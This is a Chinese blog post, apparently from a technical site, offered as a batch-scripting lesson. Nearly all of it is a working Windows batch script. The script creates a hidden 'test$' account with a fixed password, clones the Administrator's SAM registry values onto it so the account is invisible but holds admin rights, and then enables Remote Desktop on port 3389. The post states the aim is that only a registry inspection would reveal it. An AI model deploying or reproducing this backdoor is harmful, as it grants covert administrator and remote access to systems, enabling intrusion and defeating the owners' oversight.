批处理学习之四 克隆管理员账户

本文介绍了一种通过克隆管理员账户并开启远程桌面服务的方法,包括创建克隆账户、导出及修改注册表键值等步骤,最终实现隐蔽地开启3389端口。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

1、克隆管理员账户,再开3389,只有检查注册表才能被发现。

@echo off
::第一步 创建克隆账号
::设定克隆账号
set user=test
::设定被克隆账号
set buser=Administrator
::设定路径
set ridkey=HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users/
::创建账号名为%user%$ 密码为%user%88 的隐藏账号
net user %user%$ %user%88 /add
::第二步 取出克隆账号的注册表项
::导出%user%$的rid标项
reg export %ridkey%Names/%user%$ %SystemRoot%/%user%$.reg
::取出%user%$的rid
for /f "tokens=2 delims=()" %%i in ('find /i "@=HEX" %SystemRoot%/%user%$.reg') do set userrid=%%i
::导出user$的账号配置项
reg export %ridkey%00000%userrid% %SystemRoot%/%userrid%.reg

::第三步 取出被克隆账号注册表项
::导出%buser%的rid标识项
reg export %ridkey%Names/%buser% %SystemRoot%/%buser%$.reg
::导出%buser%的rid
for /f "tokens=2 delims=()" %%i in ('find /i "@=HEX" %SystemRoot%/%buser%$.reg') do set buserrid=%%i
::导出buser$的账号配置想
reg export %ridkey%00000%buserrid% %SystemRoot%/%buserrid%.reg
::第四步 替换配置
::取出克隆账号的"V"=hex:部分
for /f "skip=6 delims=()" %%o in ('find /i "," %SystemRoot%/%userrid%.reg') do @echo %%o >>%SystemRoot%/%user%-last.reg
::建立头部
@echo Windows Registry Editor Version 5.00 >%SystemRoot%/%user%-first.reg
@echo.>>%SystemRoot%/%user%-first.reg
@echo [%ridkey%00000%userrid%] >>%SystemRoot%/%user%-first.reg
::取出被克隆账号的"F"=hex:,并合并到头部
for /f "skip=2 delims=()" %%q in ('find "," %SystemRoot%/%buserrid%.reg') do @echo %%q >>%SystemRoot%/systemreg001.reg
set /p a=<%SystemRoot%/systemreg001.reg
@echo %a:~0% >>%SystemRoot%/%user%-first.reg
for /f "skip=2 delims=()" %%o in ('find /v "%a:~4%" %SystemRoot%/systemreg001.reg') do @echo %%o >>%SystemRoot%/systemreg002.reg
del /q %SystemRoot%/systemreg001.reg
set /p a=<%SystemRoot%/systemreg002.reg
@echo %a:~0% >>%SystemRoot%/%user%-first.reg
for /f "skip=2 delims=()" %%o in ('find /v "%a:~4%" %SystemRoot%/systemreg002.reg') do @echo %%o >>%SystemRoot%/systemreg003.reg
del /q %SystemRoot%/systemreg002.reg
set /p a=<%SystemRoot%/systemreg003.reg
@echo %a:~0% >>%SystemRoot%/%user%-first.reg
for /f "skip=2 delims=()" %%o in ('find /v "%a:~4%" %SystemRoot%/systemreg003.reg') do @echo %%o >>%SystemRoot%/systemreg004.reg
del /q %SystemRoot%/systemreg003.reg
set /p a=<%SystemRoot%/systemreg004.reg
@echo %a:~0% >>%SystemRoot%/%user%-first.reg
del /q %SystemRoot%/systemreg004.reg
::将"F"=hex:以前部分好了的,与"V"=hex:部分合并
type %SystemRoot%/%user%-last.reg >>%SystemRoot%/%user%-first.reg


::第四步 删除建立的克隆账号
net user %user%$ /del
::第五步 导入修改好的克隆账号注册表项
regedit /s %SystemRoot%/%user%-first.reg
regedit /s %SystemRoot%/%user%$.reg
del /q %SystemRoot%/%user%-first.reg
del /q %SystemRoot%/%user%-last.reg
del /q %SystemRoot%/%user%$.reg
del /q %SystemRoot%/%userrid%.reg
del /q %SystemRoot%/%buser%$.reg
del /q %SystemRoot%/%buserrid%.reg

::开3389
@echo Windows Registry Editor Version 5.00>%SystemRoot%/3389.reg
@echo.>>%SystemRoot%/3389.reg
@echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Terminal Server]>>%SystemRoot%/3389.reg
@echo "fDenyTSConnections"=dword:00000000>>%SystemRoot%/3389.reg
@echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Terminal Server/Wds/rdpwd/Tds/tcp]>>%SystemRoot%/3389.reg
@echo "PortNumber"=dword:00000d3d>>%SystemRoot%/3389.reg
@echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Terminal Server/WinStations/RDP-Tcp]>>%SystemRoot%/3389.reg
::端口D3D 十六进制
@echo "PortNumber"=dword:00000d3d>>%SystemRoot%/3389.reg

regedit /s %SystemRoot%/3389.reg
del %SystemRoot%/3389.reg

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值